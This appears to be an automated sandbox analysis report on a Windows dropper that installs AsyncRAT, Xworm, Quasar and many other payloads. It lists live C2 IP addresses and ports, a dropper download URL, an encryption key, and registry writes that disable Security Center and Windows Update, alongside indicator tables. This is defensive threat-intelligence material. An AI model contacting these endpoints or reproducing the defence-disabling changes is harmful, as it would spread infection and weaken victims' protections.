asyncrat | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
22-05-2024 09:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

8KB
MD5

69994ff2f00eeca9335ccd502198e05b
SHA1

b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256

2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512

ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP

96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Score

10^/10

asyncrat quasar xworm default office04 discovery evasion execution exploit persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002

Extracted

Family

xworm

Version

5.0

85.203.4.146:7000

Mutex

eItTbYBfBYihwkyW

Attributes

Install_directory
%Userprofile%
install_file
svchost.exe

aes.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

85.209.133.18:4545

Mutex

tdipywykihsjieff

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

79.132.193.215:4782

Mutex

f99ccef5-65c4-4972-adf2-fb38921cc9fc

Attributes

encryption_key
1C15E91ACCFAC60B043A1336CF6912EA8572BA83
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe	family_xworm
behavioral6/memory/6100-5936-0x0000000000420000-0x0000000000430000-memory.dmp	family_xworm

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

sysblardsv.exesyslmgrsvc.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	syslmgrsvc.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\client.exe	family_quasar
behavioral6/memory/8168-16123-0x0000000000DF0000-0x0000000001114000-memory.dmp	family_quasar

Windows security bypass 2 TTPs 18 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

syslmgrsvc.exewinqlsdrvcs.exesysblardsv.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	winqlsdrvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	winqlsdrvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	winqlsdrvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	winqlsdrvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	winqlsdrvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	winqlsdrvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysblardsv.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\win1.exe	family_asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

188 7488 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

5560 powershell.exe
7488 powershell.exe
1168 powershell.exe
6488 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

print.exeupdater.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts print.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

6332 takeown.exe
6156 icacls.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

flow	pid	process
188	7488	powershell.exe

pid	process
5560	powershell.exe
7488	powershell.exe
1168	powershell.exe
6488	powershell.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	print.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

pid	process
6332	takeown.exe
6156	icacls.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

output.exeoiii.execonhost.exeinte.exe222.exePirate_24S.exeWScript.exeNew Text Document mod.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	output.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	oiii.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	inte.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	222.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	Pirate_24S.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe

Drops startup file 2 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe

Executes dropped EXE 59 IoCs

Processes:

xin.exeeagleget-2-1-6-50.exeAntiVirus2.exeSetup.exesvchost.exewin1.exeoutput.exeSIG.EXEalabi.execrt.execrt.tmpsoundermidiplayer.exesoundermidiplayer.exeoiii.exewmpnetwk.exewmixedwk.execonhost.exesdf34ert3etgrthrthfghfghjfgh.exe7z.exe7z.exe7z.exekatD433.tmpsvcshost.exeo2i3jroi23joj23ikrjokij3oroi.exeinte.exekatDA1F.tmpvpn-1002.exetdrpload.exeprint.exesysblardsv.exe222.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeInstaller.exePirate_24S.exeupdater.exe270914205.exesyslmgrsvc.exeadwmbjfsmbak.execlient.exeClient.exe2328932319.exereverse.exe64.exewinqlsdrvcs.exe744220930.exe1346524297.exe2466314816.exeWindows Security Upgrade Service.exe1679313164.exe2269015714.exe1202339053.exe

pid	process
4436	xin.exe
3256	eagleget-2-1-6-50.exe
4304	AntiVirus2.exe
6532	Setup.exe
6100	svchost.exe
4392	win1.exe
2360	output.exe
5488	SIG.EXE
6476	alabi.exe
5168	crt.exe
6896	crt.tmp
5500	soundermidiplayer.exe
3456	soundermidiplayer.exe
860	oiii.exe
6412	wmpnetwk.exe
5892	wmixedwk.exe
6316	conhost.exe
6644	sdf34ert3etgrthrthfghfghjfgh.exe
5136	7z.exe
6800	7z.exe
6668	7z.exe
7472	katD433.tmp
3272	svcshost.exe
3776	o2i3jroi23joj23ikrjokij3oroi.exe
5268	inte.exe
2248	katDA1F.tmp
5328	vpn-1002.exe
4568	tdrpload.exe
7136	print.exe
368	sysblardsv.exe
1420	222.exe
2556	7z.exe
7756	7z.exe
6008	7z.exe
5916	7z.exe
5216	7z.exe
4476	7z.exe
7628	7z.exe
7216	7z.exe
5256	7z.exe
6256	Installer.exe
7432	Pirate_24S.exe
7184	updater.exe
6772	270914205.exe
7484	syslmgrsvc.exe
5776	adwmbjfsmbak.exe
8168	client.exe
1680	Client.exe
6192	2328932319.exe
2144	reverse.exe
5504	64.exe
216	winqlsdrvcs.exe
3328	744220930.exe
6208	1346524297.exe
4328	2466314816.exe
760	Windows Security Upgrade Service.exe
7860	1679313164.exe
6424	2269015714.exe
6728	1202339053.exe

Loads dropped DLL 20 IoCs

Processes:

xin.execrt.tmpFUT.au3wmpnetwk.exewmixedwk.exe7z.exe7z.exe7z.exevpn-1002.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe

pid	process
4436	xin.exe
6896	crt.tmp
6896	crt.tmp
6896	crt.tmp
5608	FUT.au3
6412	wmpnetwk.exe
5892	wmixedwk.exe
5136	7z.exe
6800	7z.exe
6668	7z.exe
5328	vpn-1002.exe
2556	7z.exe
7756	7z.exe
6008	7z.exe
5916	7z.exe
5216	7z.exe
4476	7z.exe
7628	7z.exe
7216	7z.exe
5256	7z.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

6332 takeown.exe
6156 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
6332	takeown.exe
6156	icacls.exe

Windows security modification 2 TTPs 21 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

sysblardsv.exesyslmgrsvc.exewinqlsdrvcs.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	winqlsdrvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	winqlsdrvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	winqlsdrvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	winqlsdrvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	winqlsdrvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	winqlsdrvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	winqlsdrvcs.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

SIG.EXEtdrpload.exe270914205.exe2328932319.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmokeUnity = "C:\\Users\\Admin\\Documents\\Mochacha\\NaturalValue.exe"	SIG.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysblardsv.exe"	tdrpload.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syslmgrsvc.exe"	270914205.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winqlsdrvcs.exe"	2328932319.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

182 pastebin.com
39 raw.githubusercontent.com
40 raw.githubusercontent.com
181 pastebin.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

57 ip-api.com

flow	ioc
182	pastebin.com
39	raw.githubusercontent.com
40	raw.githubusercontent.com
181	pastebin.com

flow	ioc
57	ip-api.com

Drops file in System32 directory 11 IoCs

Processes:

svchost.execlient.exepowershell.exesvchost.exesvchost.exeInstaller.exeadwmbjfsmbak.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\7936.hecate	svchost.exe
File opened for modification	C:\Windows\system32\Client.exe	client.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\5488.hecate	svchost.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\info	svchost.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\3736.hecate	svchost.exe
File opened for modification	C:\Windows\system32\MRT.exe	Installer.exe
File created	C:\Windows\system32\Client.exe	client.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	adwmbjfsmbak.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\3380.hecate	svchost.exe

Suspicious use of SetThreadContext 35 IoCs

Processes:

xin.exeSetup.exeSIG.EXEwmixedwk.exesvchost.exesdf34ert3etgrthrthfghfghjfgh.exeo2i3jroi23joj23ikrjokij3oroi.exeupdater.exeadwmbjfsmbak.exe

description	pid	process	target process
PID 4436 set thread context of 6520	4436	xin.exe	MsBuild.exe
PID 6532 set thread context of 5964	6532	Setup.exe	comp.exe
PID 5488 set thread context of 6928	5488	SIG.EXE	csc.exe
PID 5892 set thread context of 6880	5892	wmixedwk.exe	svchost.exe
PID 6880 set thread context of 5488	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 1196	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 7936	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 7616	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 7700	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 6908	6880	svchost.exe	svchost.exe
PID 6644 set thread context of 7472	6644	sdf34ert3etgrthrthfghfghjfgh.exe	katD433.tmp
PID 6880 set thread context of 3744	6880	svchost.exe	svchost.exe
PID 3776 set thread context of 2248	3776	o2i3jroi23joj23ikrjokij3oroi.exe	katDA1F.tmp
PID 6880 set thread context of 4580	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 7856	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 1680	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 5996	6880	svchost.exe	svchost.exe
PID 7184 set thread context of 6068	7184	updater.exe	conhost.exe
PID 7184 set thread context of 5964	7184	updater.exe	conhost.exe
PID 6880 set thread context of 8136	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 7576	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 3736	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 6728	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 5828	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 3968	6880	svchost.exe	svchost.exe
PID 5776 set thread context of 5704	5776	adwmbjfsmbak.exe	conhost.exe
PID 5776 set thread context of 5756	5776	adwmbjfsmbak.exe	explorer.exe
PID 6880 set thread context of 2736	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 3624	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 2148	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 1980	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 3920	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 1280	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 3652	6880	svchost.exe	svchost.exe
PID 6880 set thread context of 3380	6880	svchost.exe	svchost.exe

Drops file in Program Files directory 32 IoCs

Processes:

oiii.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exe

description	ioc	process
File opened for modification	C:\Program Files\Windows Media Player\wmixedwk.exe	oiii.exe
File opened for modification	C:\Program Files\Windows Media Player\mpsvc.dll	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File created	C:\Program Files\Windows Media Player\mpsvc.dll	oiii.exe
File created	C:\Program Files\Windows Media Player\wmpnetwk.exe	oiii.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpa	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxds	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpp	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File created	C:\Program Files\Windows Media Player\wmixedwk.exe	oiii.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File created	C:\Program Files\Windows Media Player\background.jpg	oiii.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe

Drops file in Windows directory 6 IoCs

Processes:

tdrpload.exe270914205.exe2328932319.exe

description	ioc	process
File created	C:\Windows\sysblardsv.exe	tdrpload.exe
File opened for modification	C:\Windows\sysblardsv.exe	tdrpload.exe
File created	C:\Windows\syslmgrsvc.exe	270914205.exe
File opened for modification	C:\Windows\syslmgrsvc.exe	270914205.exe
File created	C:\Windows\winqlsdrvcs.exe	2328932319.exe
File opened for modification	C:\Windows\winqlsdrvcs.exe	2328932319.exe

Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3464 sc.exe
7876 sc.exe
5816 sc.exe
4384 sc.exe
5760 sc.exe
7588 sc.exe
6164 sc.exe
2648 sc.exe
1456 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5324 4436 WerFault.exe xin.exe

pid	process
3464	sc.exe
7876	sc.exe
5816	sc.exe
4384	sc.exe
5760	sc.exe
7588	sc.exe
6164	sc.exe
2648	sc.exe
1456	sc.exe

pid	pid_target	process	target process
5324	4436	WerFault.exe	xin.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exeFUT.au3

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FUT.au3

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

5816 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

7048 taskkill.exe

pid	process
5816	schtasks.exe

pid	process
7048	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

SearchProtocolHost.exeSearchIndexer.exepowershell.exeSearchFilterHost.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-914 = "SVG Document"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E46787A1-4629-4423-A693-BE1F003B2742} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000ab5fc8a628acda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-3 = "Microsoft Traditional Chinese to Simplified Chinese Transliteration"	SearchIndexer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-8 = "Microsoft Malayalam to Latin Transliteration"	SearchIndexer.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{C120DE80-FDE4-49F5-A713-E902EF062B8A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000098a082a728acda01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-170 = "Microsoft PowerPoint 97-2003 Presentation"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-5 = "Microsoft Transliteration Engine"	SearchIndexer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
